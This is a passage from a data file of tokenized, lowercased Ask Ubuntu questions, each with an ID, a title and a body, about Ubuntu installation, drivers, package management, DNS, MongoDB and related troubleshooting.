libgadu3 kalarm blogilo kdewebdev kwrite libkeduvocdocument4 plasma-dataengines-addons libkdcraw-data kdegames amor marble-plugins kdeaccessibility rocs libboost-graph1.46.1 libnova-0.12-2 ktouch kbreakout kbounce kfourinline libkdegames5a kdetoys python-avogadro ktimetracker akregator avogadro-data kollision kdegraphics-strigi-analyzer python-enchant python-qt4 kamera sweeper lokalize kwordquiz kde-plasma-desktop libanalitza4abi1 ktron bovo python-sip cvs kdenetwork libkggzgames4 libmikmod2 step python-vobject palapeli-data krosspython kuser dragonplayer kcolorchooser kreversi kdf python-qt4-sql plasma-widget-folderview kdegraphics-mobipocket kspaceduel libkrossui4 kig rdesktop ksudoku juk tasks-icons klines kstars-data libao4 lskat plasma-widgets-addons kgamma kde-config-cddb kommander libkopete4 kdegames-card-data kubrick kgeography-data ksaneplugin kdeutils kjumpingcube kdegraphics khangman plasma-scriptengine-superkaramba libkexiv2-10 libqtassistantclient4 kscreensaver marble kolourpaint4 libindi0 killbots kapman plasma-widget-lancelot fonts-dustin kde-plasma-netbook plasma-runners-addons vorbis-tools poxml parley-data libkmahjongglib4 kpartloader kdesdk-kio-plugins cvsservice libksane-data kbattleship kdeadmin kdesdk-scripts kdegames-mahjongg-data kdemultimedia-kio-plugins filelight xplanet-images libkdcraw20 kopete kde-config-cron kdesdk-misc palapeli kate kapptemplate ktouch-data kdewallpapers kscreensaver-xsavers kdesdk-strigi-plugins marble-data kjots klettres-data kdeartwork-emoticons libktorrent3 kmines python-iniparse kget kalgebra-common system-config-printer-kde kremotecontrol kdenetwork-filesharing kgpg libboost-regex1.46.1 konquest kigo kdemultimedia kmousetool kdepim-strigi-plugins optipng libmsn0.3 libkdeedu-data kuiviewer kmag gnugo kdeedu-kvtml-data ktuberling kturtle ktimer python-kde4 kteatime kmix kdeartwork kmtrace plasma-widget-message-indicator libsmpeg0 use 'apt-get autoremove ' to remove them . the following packages will be removed : kalgebra kde-full kdeedu 0 upgraded , 0 newly installed , 3 to remove and 18 not upgraded . after this operation , 497 kb disk space will be freed . do you want to continue [ y/n ] ? now that would unistall some needed package for kde as well . how to prevent it and unistall realy only what i want to uninstall ? i do n't believe that all of these packages are there only because of kalgenra .
500178	how to recover partition when uninstalling wubi ?	i have uninstalled wubi on my laptop , the problem is , my hard disk space was n't restored . it went from 500gb to 250gb when i installed wubi , but when i uninstalled wubi/ubuntu , my hard disk space is still 250gb . so how do i recover the partition that i alloted upon installation of wubi ?
500180	using camera in opencv	i want to make a robot and i should do live image processing.so i need to take video from somewhere from a camera ( canon powershot a3100 ) and process it.note that taking video is live means that when the camera got the frame i should process that frame . i 'm using capturefromcam ( 0 ) that uses integral webcam . i also used 1 instead of 0 but it does n't find the camera ! please help me
500181	javafx mp3 playback ubuntu 14.04	i am trying to play mp3 file in java program using javafx . i installed dependencies libavcodec53 and libavformat53 mentioned here . i used following code public void play ( string path_to_song ) { jfxpanel fxpanel = new jfxpanel ( ) ; string song = new file ( path_to_song ) .touri ( ) .tostring ( ) ; media audio =null ; audio = new media ( song ) ; mediaplayer mediaplayer = new mediaplayer ( audio ) ; mediaplayer.play ( ) ; } but i still got error `` error media audio format unsupported '' exception in thread `` main '' mediaexception : media_unsupported : com.sun.media.jfxmedia.mediaexception : `` error media audio format unsupported '' : com.sun.media.jfxmedia.mediaexception : `` error media audio format unsupported '' at javafx.scene.media.mediaexception.exceptiontomediaexception ( mediaexception.java:125 ) at javafx.scene.media.mediaplayer.init ( mediaplayer.java:474 ) at javafx.scene.media.mediaplayer. < init > ( mediaplayer.java:383 ) at playback.player.play ( player.java:39 ) at engine.execute.main ( execute.java:15 ) caused by : com.sun.media.jfxmedia.mediaexception : `` error media audio format unsupported '' at com.sun.media.jfxmediaimpl.mediautils.nativeerror ( mediautils.java:331 ) at com.sun.media.jfxmediaimpl.platform.gstreamer.gstmedia.init ( gstmedia.java:50 ) at com.sun.media.jfxmediaimpl.platform.gstreamer.gstmedia. < init > ( gstmedia.java:33 ) at com.sun.media.jfxmediaimpl.platform.gstreamer.gstmediaplayer. < init > ( gstmediaplayer.java:39 ) at com.sun.media.jfxmediaimpl.platform.gstreamer.gstplatform.prerollmediaplayer ( gstplatform.java:100 ) at com.sun.media.jfxmediaimpl.platform.platformmanager.createmediaplayer ( platformmanager.java:173 ) at com.sun.media.jfxmediaimpl.nativemediamanager.getplayer ( nativemediamanager.java:264 ) at com.sun.media.jfxmedia.mediamanager.getplayer ( mediamanager.java:139 ) at javafx.scene.media.mediaplayer.init ( mediaplayer.java:431 ) any ideas ?
500182	how do i make my nvidia settings permanent on every login ?	i want to make my nvidia settings permanent on every login/boot i do . i am currently the only one using this pc so it is just a hazzle to change it everytime i start up the pc . i have read and used http : //unix.stackexchange.com/questions/46474/how-to-make-changes-in-nvidia-settings-tool-persistent but it did n't do anything at all on my machine . could anyone explain it to me like i am 5 so it becomes more clear for me what to do ?
500190	i want be sure before install ubuntu desktop on laptop	ok , this my question.if my laptop can run window vista , can i run ubuntu desktop 14.04 as well.just want be sure .
500192	0 byte update package	for some reason , every time i open the update manager ( muon in my case ) it shows me that i need to update `` playbar '' ( an kde : plasma plugin i do n't use.. ) to the version 0.5.1 with 0 b to download.. that version is already on my pc . i 've seen 0 byte updates before when my internet went down before updating , but this is different . does anyone know how to remove said package or at least the update message ? what i have tried : installing the 0 byte update ( happens instant and wo n't do anything ) , removing the plugin , removing and reinstalling the plugin . additional infos : kubuntu 14.04 - 3.13.0-32 generic plasma-desktop -- version gives : qt : 4.8.6 kde development platform : 4.13.2 plasma desktop shell : 4.11.10
500197	saitek evo force ubuntu 14	is it possible to use the saitek evo force joystick on ubuntu ? i have installed the joystick support , but the device is not detected .
500198	weird folder names in linux ( ubuntu )	i have a few questions . some things are bothering me , and maybe if i can understand why they are a certain way , i can rest my mind a bit . in windows , about 95 % of folder and file names make sense . they clearly describe their purpose . on linux , the official user manual , states the following : /bin and /sbin : stores many essential system applications /etc : stores system-wide configuration files . my question is , why are folder names so silly / stupid / weird / unrelated to their purpose ? why would `` essential system applications '' be placed in a folder named after a thing that is used to hold unwanted things ? ( bin ) why would `` system-wide configuration files '' be stored in a folder called `` etc '' ?
500202	out sound from the terminal	in a lot of hollywood movies when the ace hacker has just created a script to bring down the bad guys network the terminal makes a sound as the script outputs , a sort of digital typing that the computer is doing . how can i get my terminal to do the same ?
500204	failed to load package lists error	i get a 'failed to load package lists ' - this did n't work : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update here is a screenshot i am using the live cd
500205	ubuntu 14.04 with windows 7 dual boot problem	i have installed ubuntu 14.04 using live usb . i installed ubuntu in a totally empty partition with ext4 file system . now when i restart the computer the loader takes me directly to windows 7 without giving me an option to choose ubuntu or windows . when i insert the usb drive and restart the computer a weird red screen appears when i boot from the usb with a term grub in a few lines . and it gives me option that i dont know anything about like load windows with slis or load windows without slis or something . when i go into windows the partition that i installed ubuntu in is totally vanished.i am able to use the try ubuntu option through which i have a access to ubuntu o.s . please help me
500208	bulk insert a csv file into mongodb through ubuntu terminal ?	i 'm trying to performance test mongodb through ubuntu , and i 've run into problems trying to upload a csv file to populate the database . my db is called 'assignment ' and i want to create a collection : 'airport ' . my csv file is located inmy ubuntu desktop file . i 've tried both the following commands : mongoimport -- db assignment -- collection airport -- type csv -- headerline -âignoreblanks -- file aircraft.csv mongoimport -- db assignment -- collection airport -- type csv -- headerline -âignoreblanks -- file /home/jon/desktop/aircraft.csv ... but get the following error in both instances : 2014-07-20t03:01:41.273-0700 syntaxerror : unexpected identifier please can anyone advise where i 'm going wrong ? greatly appreciate any help . r , jon
500209	alternative/indicator to dash search bar	is there any alternative/indicator to dash search for searching and opening applications & files ? how to install it in ubuntu 14.04 ?
500213	ubuntu install deleted windows 8 partition ; how to recover it on ubuntu	i tried to install ubuntu to get dual os but incidentally delete one of the windows ' partition in the process ... ... i ca n't boot windows or even use the recuse tool to recovery it ... i 've backed up my c drive on ubuntu and now i 'm wondering if i can somehow recover that partition without having to reinstall as i do n't have windows ' installation cd/usb from what i searched online it seems like what i am missing is either the recovery partition or the loader partition ? ( are there supposed to be 2 loader partitions ? ) however , i ca n't really find a solution that 's suitable to my situation . right now all i have is a bootable ubuntu usb and i do n't have a bootable windows media i 'm using sony ultrabook , so there 's no cd drive . i 'm just wondering if i know which partition i deleted and i can format the partition in the right form and copy the files there ... will it fix my problem ... . ? i 've attached screenshot of my current partition info ============ yay ! my windows boots ! ca n't post this as an answer since i just registered . i found exactly what i needed here : datarecovery ! thanks @ creator for suggesting ntfsundelete as that 's what led me to this page . anyway , what i did is the following : sudo swapoff -a sudo parted /dev/sda rescue 1 273 ( i put 1 273 because i remember i saw 1 mb of freespace before i clicked delete partition ... and 273 is amount of total freespace ) the tool then suggested that looks like a fat32 partition which sounds legit so i selected yes to recover i restarted the computer with my fingers crossed but it still does n't boot then i try to boot from my ubuntu usb again and select `` detect disk error '' instead of `` try ubuntu '' that 's when the miracle happens ! ! thanks everyone for your help !
500217	how to properly quote piped command for `` watch '' ?	i want to keep an eye on a file as it is created . so i used this command ls -hal ./file |awk ' { print $ 5 } ' which gives the size of the file i am looking for . i use awk because i do n't need other stuff , just the file size . but i 'm unable to use this with watch command , because if i try watch ls -hal ./file |awk ' { print $ 5 } ' then watch only accepts ls -hal ./file and then pipes it to awk , giving no output . if i try watch `` ls -hal ./file |awk ' { print $ 5 } ' '' then it gets weird showing wrong command and whole output . every 2.0s : ls -hal ./file |awk ' { print } ' sun jul 20 15:52:18 2014 -rw-rw -- -- 1 aditya aditya 1.7k jul 20 15:52 ./file you can see there is no $ 5 in the awk command . further quoting creates various similar errors . so what is the right way to quote this command ?
500219	yoda soccer installation in ubuntu 14.04	http : //sourceforge.net/projects/yodasoccer/postdownload ? source=dlp . can anyone tell me how to install this game on ubuntu 14.04 64 bit ? i am completely new to ubuntu . the format of the downloaded file will be tar.gz
500222	is ubuntu the right platform for cae	does ubuntu support cae software like ansys workbench , pamcrash and abaqus ?
500224	app not opening from terminal after installation	i 'm trying to install leksah ide . i followed the instructions on the leksah website and it said it installed correctly , but now it wo n't open . after installing , i entered : jase @ jase-pc : ~ $ leksah using default yi configuration leksah : symbol lookup error : leksah : undefined symbol : gtk_source_language_manager_guess_language jase @ jase-pc : ~ $ and i got the above error . i then uninstalled lekash and installed it again but this time from the ubuntu software ctr . it installed again , but i still get the same error when i try to run it from the terminal . ( there appears to be no way to open the ide from the launcher/dash ) . how do i open this thing ?
500227	formatting 2 hard drives through livecd	what i want to do is completely wipe the 2 hdds that are in my laptop , erasing everything ( windows , ubuntu ) so its essentially factory new . from there i want to just reinstall windows , bit i do n't need help with that . how would i do this through livecd ? will this get rid of bios ? i hope not will my method work of wiping both drives and reinstalling windows ? will there be any leftover junk from the old windows/ubuntu installations ? any better methods or repercussions of doing this ? thanks in advance , i know this is a lot
500228	audio input prompt not updated	i am currently running 14.04 on a dell xps 13 . i have installed some of the drivers from the driver support pack . however , these drivers were created for 12.04 . the problem i am getting is that the audio input prompt no longer shows the the headset option . i have tried reinstalling the alsa sound drivers as well as pulseaudio . i even reinstalled the kernel . the prompt remains the same . any ideas ?
500233	scripts for turning the wifi card on and off	the wifi key on my laptop does n't work under xubuntu trusty . network manager can only soft block wifi , as revealed by the rfkill command . so , i 'm looking for a script which can turn off wifi and bluetooth at the hardware level . as mentioned here you can use the rfkill command but the index may not be the same always . unfortunately i do n't have any expertise with bash , awk or grep . this is important for me because it saves battery power . if you could also tell me how to map the script to the key that would be amazing !
500234	bind9 dns works predictably for osx machines but not for windows machines	i have set up s dns server using bind9 . the purpose is to create a zone so that developers can browse to their work at something.dev.di where something could be anything as long as there is a matching virtual host in the apache2 configuration . this has worked as expected on my osx machines . i must admit that i was surprised when it all worked as expected at the first attempt . then i tested it on a windows 8.1 machine . the results have been very confusing for me . i have one virtual host where the server name setting is example_site.dev.di - this works perfectly well on the osx machine but on the windows machine i get 'server not found ' . so i did a bit of random testing and found several addresses that worked on osx but not on windows . for example , on osx test.dev.di works , it displays the default web site as expected because there is no equivalent virtual host . on windows it fails . other examples where it works on osx but not windows : something.dev.di ( but anything.dev.di does work ) , testing.dev.di , a.dev.di ( but y.dev.di does work ) , in fact all single characters fail except 't ' and 'y ' and the numbers 6 and 8 . here 's the only changes that i made to the bind9 config : i added the following to /etc/bind/named.conf.local which was otherwise empty bar some comments : zone `` dev.di '' { type master ; file `` /etc/bind/db.dev.di '' ; } ; i created a file called /etc/bind/db.dev.di and entered the following : ; ; bind data file for development server ; $ ttl 14400 @ in soa dev.di . root.dev.di . ( 2014072001 ; serial 86400 ; refresh 7200 ; retry 3600000 ; expire 86400 ) ; negative cache ttl ; @ in ns dev.di . @ in a 192.168.1.201 * in a 192.168.1.201 @ in aaaa : :1 i am at a loss as to how to troubleshoot this because the success/fail seems so random . any help or advice would be most welcome . thanks , simon .
500235	torrents on a headless server	i am running a home headless server and i want it to be able to download torrents for each of the home users . i was looking at transmission ( with its transmission-remote frontend ) but i do n't like about it that all torrents are downloaded to a common location , since there is no per-user process , just a system-wide daemon . which torrent program can let me manage torrents on a headless server without mixing up each user 's torrents ?
500236	theme specific applications only ( in special banshee )	there . i have made a custom version of the ambience theme , that is in a light green color . now , i want to darken up the banshee player a bit , that it does n't blind me at night . i found a file called banshee.rc in the gtk-2.0/apps folder of the theme . is it possible to change the look of banshee with this file ? where do i find some documentation about that type of styling files ?
500239	lenovo x1 carbon ( gen1 ) battery life	i 'm using an lenovo x1 carbon ( gen1 ) and have ubuntu 14.04 and tlp installed . i 'm really dissapointed about the battery life . some people claim to have 6 hours ( https : //dague.net/2014/01/11/thinkpad-x1-carbon-awesome-linux-laptop/ ) and even sometimes 8 hours ( thinkpad x1 carbon - terrible battery life on raring ) . i usually get 3 hours with reduced screen brightness ( 3 tips ) with moderate usage like browsing the web , looking at pdfs and doing some programming . what battery life do you get and please post your powertop otherwise i ca n't believe those 6 or 8 hours ... here is mine : the battery reports a discharge rate of 10.7 w the estimated remaining time is 3 hours , 22 minutes summary : 627.5 wakeups/second , 13.9 gpu ops/seconds , 0.0 vfs ops/sec and 12.1 % power est . usage events/s category description 3.55 w 60.0 % device display backlight 708 mw 8.0 ms/s 138.4 interrupt ps/2 touchpad / keyboard 584 mw 13.4 ms/s 106.0 process /opt/google/chrome-unstab 575 mw 3.1 pkts/s device network interface : eth0 ( 370 mw 21.3 ms/s 59.3 process compiz 319 mw 0.1 pkts/s device nic : vmnet8 so usually my display , chrome and wifi is draining my battery most . further i use my laptop extensively since one year and already lost 18.2 % of my battery capacity ( 37.6 wh left ) . the keyboard uses that much power since i upgraded to 14.04 . anybody else noticed this ? thanks !
500241	system.profile.find ( ) command returns no results	i 'm trying to run queries against mongodb ( in ubuntu ) and analyse the execution times . i think i 've set the profiler up correctly , but when i run a query against it , i 'm not getting any response whatsoever . clearly i 'm missing something . the code below shows the db i 've created , inserted a single document , run a count against the db , and then tried to access the profiler stats : > db.setprofilinglevel ( 2 ) { `` was '' : 0 , `` slowms '' : 100 , `` ok '' : 1 } > use products switched to db products > db.products.count ( ) ; 0 > book1= { `` isbn '' : '' 456 '' } { `` isbn '' : `` 456 '' } > db.products.insert ( book1 ) ; writeresult ( { `` ninserted '' : 1 } ) > db.products.count ( ) ; 1 > db.products.system.profile.find ( ) ; > can anyone advise where i 'm going wrong ? thanks for your help . r , jon
500242	i need to install dymo software for labelwriter 450 , but i ca n't ... any help ?	i ca n't find how to install and use the labelwriter 450 and it 's urgent . i print for my job 50 to 100 labels per week . i do n't know what to do , i just went to ubuntu from windows 8.1.1 . i tried with wine but still does n't work .
500244	custom ubuntu theme : make title bar black when fullscreen	half a year ago , i made a custom version of the ambience theme to fit it to the colors i like . now i try to make the title bar/panel ( the bar where the icons and the clock is in ) of the system black like on the ipad for example . i also want the upper part of the applications to be black , when they are fullscreen ( that they match the title bar )
500247	pogramming php on ubuntu	could you please tell me how to use xampp ( like on windows ) on ubuntu step by step ? i would like to program in php with phpmyadmin ... . but i 'm in trouble because what i did in last few weeks did n't work at all.. my localhost still not works ... please help me ! when i try to start my localhost ( apache ) by using xampp program , it close the connection because it says that there 's a conflict with ports ... : ' (
500248	some letters in some languages are not displayed correctly in xfce in google chrome 's tabs and omnibar	google chrome 's tabs can not display some letters of some languages . this screenshot takes arabic as an example . the page itself has no problems at all . the tabs , however , can not display the letters . not just arabic , other languages too . this problem happens only in xfce ! ! i thought i might change the tabs ' font but i could n't figure out how . does anyone know a fix ?
500249	unzip 5gb zip file	i have here 5gb zip file but i have no idea how to unzip that . i tried : 7z x file.zip returns : error : can not open file as archive jar xvf file.zip returns : jar : error opening file.zip for reading : value too large for defined data type unzip file.zip returns : end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . note : file.zip may be a plain executable , not an archive unzip : can not find zipfile directory in one of file.zip or file.zip.zip , and can not find file.zip.zip , period . the file does seem to be a zip archive : $ file file.zip file.zip : zip archive data , at least v1.0 to extract any idea ? thanks .
500250	unable to install ubuntu from cd	i recently purchased a live cd , however it will not install this . when i try to install i get this message : busybox v1.21.1 ( ubuntu 1:1.21.o-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system this also happens with downloaded versions as well . i have the disc , i do not have a usb stick . i 'm at my wits end . what the hell is going on ? i 'm running windows 7 home premium reset to factory default . everything looks good , so what is the problem ? arrrgh ! !
500252	boot device not found after installation of windows 8.1 and ubuntu 14.0.4	after earlier problems with a dual boot setup with windows 7 and ubuntu 14.04 i decided to start with a clean install of windows 8.1 and installed ubuntu after that . after the installation of ubuntu ( from live-usb ) on a new partion my computer ( hp elitebook 8570w ) only booted windows 8.1 without letting me choose . therefore , i decided to run boot repair by using the ubuntu live-usb . see boot repair boot info summary . however , when starting up my computer it gives an error saying `` bootdevice not found '' and `` hard disk - ( 3f0 ) '' . i 'm quite new to ubuntu and do n't know a lot about bootdevices etc . any help is very much appreciated .
500254	what is causing these display bugs ?	since i installed 14.04 i have some annoying display bugs . everything works fine except for some stripes which appear sometimes in the window switcher and on the maximize button for example . any idea what might solve this ? i am using a dell inspiron 1545 with an onboard intel card description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation
500255	virus infection in ubuntu 14.04	i am using ubuntu 14.04.my computer is infected by viruses or malicious software installed without my knowledge during web surfing . i am saying this because whenever i search anything in google search it is showing me only the error message that we are sorry , we can not process your request , so i visited the help link provided by google & tried all the steps instructed there but could not resolve the issue . there i am asked to scan my system because my computer has been affected by some malicious contents.in addition with it i would like to inform that i have installed wine software in order to run windows application in ubuntu & installed idm.can anybody suggest me how do i get rid of this problem . i installed clamav , scaned the computer using clamscan . got the following results /initrd.img.old : symbolic link /vmlinuz.old : symbolic link /initrd.img : symbolic link /vmlinuz : symbolic link -- -- -- -- -- - scan summary -- -- -- -- -- - known viruses : 2424225 engine version : 0.98.1 scanned directories : 1 scanned files : 0 infected files : 0 data scanned : 0.00 mb data read : 0.00 mb ( ratio 0.00:1 ) time : 4.375 sec ( 0 m 4 s ) yet i do n't know whether my problem is resolved or not because it is showing the known viruses 2424225
500257	dell fn + f2 key for wifi switch on/off did n't work	i go throw all topic of fn + f2 key for wifi switch on/off . but i still have some questions . i bought a dell inspiron with ubuntu 12.04 lts preinstalled and has hardware certified . i read the ubuntu hardware certified and it has already stated that my laptop fn + f2 to switch wifi on/off will not work . but somehow on my preinstalled system they did something that actually make it worked . i switch wifi on and the rfkill list giving this : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no i switch off wifi using fn+f2 and run rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes so it means they does the hard blocked on wifi and it is automatically turn off bluetooth hardware . and i want to know how can they do this to my system , which package they preinstalled that work that way ? i tried installed other ubuntu version like 12.04 amd64 or 14.04 amd64 but it not work like the old system . and if i update the preinstalled to newer kernel , it breaks the fn+f2 switch .
500258	libreoffice writer : replace specific keystrokes with custom text or characters	in formal writing i try to use n-dashes correctly so , for example , instead of : 2013-14 i write : 2013â14 . to get an n-dash i currently use the compose key ( the right windows key in my case ) , then type the following sequence : - - . ( [ hyphen ] [ hyphen ] [ full-stop ] ) . but this means typing four keys ( including the compose key ) to produce one character , which gets tedious . there has to be a better way . another way to get an n-dash in libreoffice writer is use the autocomplete feature and just to type two hypens ( -- ) but there is a catch : it only works if the hyphens are preceded and followed by a space . ( if you do n't leave the spaces , writer turns the double hyphen into an m-dash ) . so in order to type `` 2013â14 '' one would need this key-sequence : 2013 [ space ] - - [ space ] [ backspace ] [ left arrow ] [ backspace ] [ right arrow ] 14 i.e . you need four keystrokes to insert the n-dash , and four more to remove the unwanted spaces and get the cursor back to where it needs to be ! so , how do i assign a single keystroke combination , such as the ctrl + [ hyphen ] keys , to a character such as an n-dash ?
500260	corrupted windows 8 virtual machine start screen	i 'm running geforce gt 330m/pcie/sse2 with proprietary driver ( nvidia_331_updates ) . everything works normally with no issues until i suspend my ubuntu 14.04 host . if i suspend from the drop-down menu with my windows 8 virtual machine running ( vmware workstation 10 ) and resume my computer later , i see this in the vm : other than the start screen , the vm works as normal . if instead i suspend ubuntu by closing the lid of my laptop , i get the same issue with my vm and some graphics problems in the host . for example , the black frame around system monitor : i have no clue how to troubleshoot this . could someone suggest a solution .
500261	errors installing the perl module file : :scan : :clamav	ubuntu 14.04 lts , gnome desktop . i 'm missing one of the requires for having clamav work with spamassassin and it will not install , here is the output . the command used to install is : chris @ localhost : ~ $ sudo -s [ sudo ] password for chris : root @ localhost : ~ # perl -mcpan -e shell terminal does not support addhistory . cpan shell -- cpan exploration and modules installation ( v2.00 ) enter 'h ' for help . cpan [ 1 ] > install file : :scan : :clamav cpan.pm : building j/ja/jamtur/file-scan-clamav-1.91.tar.gz checking if your kit is complete ... looks good writing makefile for file : :scan : :clamav writing mymeta.yml and mymeta.json cp lib/file/scan/clamav.pm blib/lib/file/scan/clamav.pm manifying blib/man3/file : :scan : :clamav.3pm jamtur/file-scan-clamav-1.91.tar.gz /usr/bin/make -- ok 'yaml ' not installed , will not store persistent state running make test perl_dl_nonlazy=1 clamd_path=/usr/sbin /usr/bin/perl `` -mextutils : :command : :mm '' `` -e '' `` test_harness ( 0 , 'blib/lib ' , 'blib/arch ' ) '' t/*.t t/00basic.t ... ... . ok t/01ping.t ... ... .. 1/3 # failed test 2 in t/01ping.t at line 26 # t/01ping.t line 26 is : ok ( $ av- > ping ) ; t/01ping.t ... ... .. failed 1/3 subtests t/02reload.t ... ... 1/3 # failed test 2 in t/02reload.t at line 25 # t/02reload.t line 25 is : ok ( $ av- > reload ) ; t/02reload.t ... ... failed 1/3 subtests t/03quit.t ... ... .. 1/4 # failed test 2 in t/03quit.t at line 31 # t/03quit.t line 31 is : ok ( $ av- > quit ) ; t/03quit.t ... ... .. 3/4 error : local : socket file /root/.cpan/build/file-scan-clamav-1.91-_962_7/clamsock could not be bound : permission denied t/03quit.t ... ... .. failed 1/4 subtests t/04scan.t ... ... .. 1/8 # test 4 got : `` '' ( t/04scan.t at line 36 ) # expected : `` 1 '' ( did n't detect /root/.cpan/build/file-scan-clamav-1.91-_962_7/testfiles/clamavtest ) # t/04scan.t line 36 is : ok ( exists ( $ results { `` $ testdir/clamavtest '' } ) , 1 , `` did n't detect $ testdir/clamavtest '' ) ; # test 5 got : `` '' ( t/04scan.t at line 37 ) # expected : `` 1 '' ( did n't detect /root/.cpan/build/file-scan-clamav-1.91-_962_7/testfiles/clamavtest.zip ) # t/04scan.t line 37 is : ok ( exists ( $ results { `` $ testdir/clamavtest.zip '' } ) , 1 , `` did n't detect $ testdir/clamavtest.zip '' ) ; # test 6 got : `` '' ( t/04scan.t at line 38 ) # expected : `` 1 '' ( did n't detect /root/.cpan/build/file-scan-clamav-1.91-_962_7/testfiles/clamavtest.gz ) # t/04scan.t line 38 is : ok ( exists ( $ results { `` $ testdir/clamavtest.gz '' } ) , 1 , `` did n't detect $ testdir/clamavtest.gz '' ) ; t/04scan.t ... ... .. failed 3/8 subtests t/05streamscan.t .. 1/8 # test 5 got : < undef > ( t/05streamscan.t at line 43 ) # expected : `` found '' # t/05streamscan.t line 43 is : ok ( $ ans , 'found ' ) ; # test 6 got : < undef > ( t/05streamscan.t at line 44 ) # expected : `` clamav-test-signature '' # t/05streamscan.t line 44 is : ok ( $ vir , 'clamav-test-signature ' ) ; t/05streamscan.t .. failed 2/8 subtests t/pod-coverage.t .. ok t/pod.t ... ... ... .. ok test summary report -- -- -- -- -- -- -- -- -- - t/01ping.t ( wstat : 0 tests : 3 failed : 1 ) failed test : 2 t/02reload.t ( wstat : 0 tests : 3 failed : 1 ) failed test : 2 t/03quit.t ( wstat : 0 tests : 4 failed : 1 ) failed test : 2 t/04scan.t ( wstat : 0 tests : 8 failed : 3 ) failed tests : 4-6 t/05streamscan.t ( wstat : 0 tests : 8 failed : 2 ) failed tests : 5-6 files=8 , tests=29 , 53 wallclock secs ( 0.04 usr 0.01 sys + 49.99 cusr 2.21 csys = 52.25 cpu ) result : fail failed 5/8 test programs . 8/29 subtests failed . make : *** [ test_dynamic ] error 255 jamtur/file-scan-clamav-1.91.tar.gz /usr/bin/make test -- not ok //hint// to see the cpan-testers results for installing this module , try : reports jamtur/file-scan-clamav-1.91.tar.gz running make install make test had returned bad status , wo n't install without force failed during this command : jamtur/file-scan-clamav-1.91.tar.gz : make_test no cpan [ 2 ] > exit terminal does not support gethistory . lockfile removed . output of any sa process . in this case i just ran sa-learn -- dump magic , errors noted below : chris @ localhost : ~ $ sa-learn -- dump magic plugin : failed to parse plugin /etc/spamassassin/clamav.pm : ca n't locate file/scan/clamav.pm in @ inc ( you may need to install the file : :scan : :clamav module ) ( @ inc contains : lib /usr/share/perl5 /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl ) at /etc/spamassassin/clamav.pm line 14 . begin failed -- compilation aborted at /etc/spamassassin/clamav.pm line 14 . compilation failed in require at /usr/share/perl5/mail/spamassassin/pluginhandler.pm line 109 . does anyone know of a method to get this installed ? had no issues on my old mandriva machine of course that 's dead and gone as of last weekend .
500264	does virtual box supports 64 bit of ubuntu	i am trying to install unbuntu 14 as a guest os using virtual box . the host is windows 8.1 . virtualization is enabled . still the virtual box shows only the 32-bit option for installing ubuntu ( see virtual box screenshot ) . processor used is amd a10 processsor and virtualization is enabled in bios ( see task manager screenshot ) . i have checked other posts related to this one and they all say that virtual box supports guest os to be ubuntu 64 bit , what else do i need to do ?
500269	external harddisk converted to udf volume . how to reverse ?	i was trying to mount an image file over a usb . from one of forums thread i used this solution : sudo dd if=/path/to/downloaded.img of=/dev/sdb i copied the image file from an external hd to my local machine . i did n't unmount the ext hd . after executing the command my ext hd converted to udf volume and the image was mounted onto it . now i would like to use my ext hd as normal hd . but i am not able to turn it back from udf volume . it was a 2tb ext hd having around 1tb of data . every time i connects it to system it gets mounted as udf volume . i am not able to access it on window system also . is there some way i can get my data back .
500272	i can not resolve the following erro message	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/za.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
500274	no internet connection	ok so i installed 14.04 from a usb . i downloaded it to from on computer and installed it on an old dell 2006 . i had internet before installing , but now i have nothing . no wireless and not internet using an ethernet cable . what should i do ? thanks for any help . lspci -nnk | grep -ia2 net
500276	how to run backintime as a user	to allow users to run backintime . i am usually running backintime-kde on ubuntu in the following way : sudo su ssh-agent bash backintime-kde4 -- config /root/.config/backintime/config -- profile-id 1 this is the only way i found which was working on my system . in particular sudo backintime-kde4 and kdesudo backintime-kde4 will not work . i would like to allow ordinary users who do not have permissions to run sudo su to execute backintime as well . can i somehow create a shell-script from the commands which can be executed by any user such that he has to enter at most his own password ( and maybe that of the ssh-key ) . please do not suggest alternate ways of running backintime . i merely search a method equivalent to the one described above ( such that backintime operates in the same tested way ) . however the user should be able to run it without being able to obtain general root privileges .
500278	installer hangs on `` detecting file systems ... ''	i managed to completely screw up my system while trying to install windows 8 . i decided to reinstall and only format my / and /usr partition to keep my data . my installation is now hanging on `` detecting file systems ... '' . both of the drives are gpt , not mbr . could this be the issue ? if so , how can i fix it ?
500279	how to change the date/time format to english , while preserving my own country 's regional settings	i 've been using english as my system language , but greek for regional formats . the thing is i want the date and time to appear in english too , while preserving the rest of my settings in the regional format settings ( e.g . euro sign for the currency , metric system etc etc . ) the reason is clearly aesthetic , although i assume that for some other languages ( e.g . arabic , etc ) it should be also a practical reason since the dateand time in terminal would not appear correct . thanks in advance ! ( trusty , 14.04 )
500282	launcher combines eclipse icons	i 'm working simultaneously with java eclipse ide and the android adt ( also with eclipse ide ) . even though i create two different .desktop files with different icons , after launching ubuntu still combines them to the same icon ( which is the adt icon ) . the java ide is of a newer version of eclipse and has a different icon , and when i check `` about '' in each window i can see that those are 2 different programs . nevertheless it still combines them ... so my question is whether i can change the running icon ( meaning the icon that comes up at the launcher after the program finished its launching ) or if i can define different icons for the different applications . at the moment it looks like this
500283	when deleting a file in nautilus , what 's the difference between `del` and `shift+del` ?	in windows there 's a difference between hitting del key or shift+del keys . hitting del would simply move the file to recycle bin but hitting shift+del will delete the file permanently . my question is : does it work the same way in nautilus ?
500284	why my root password is not working ?	i guess as the root password is default user account password ( if i am wrong correct me ) in terminal when i type su it asks me password when i enter my password it says authentication failure why is it happening ? ?
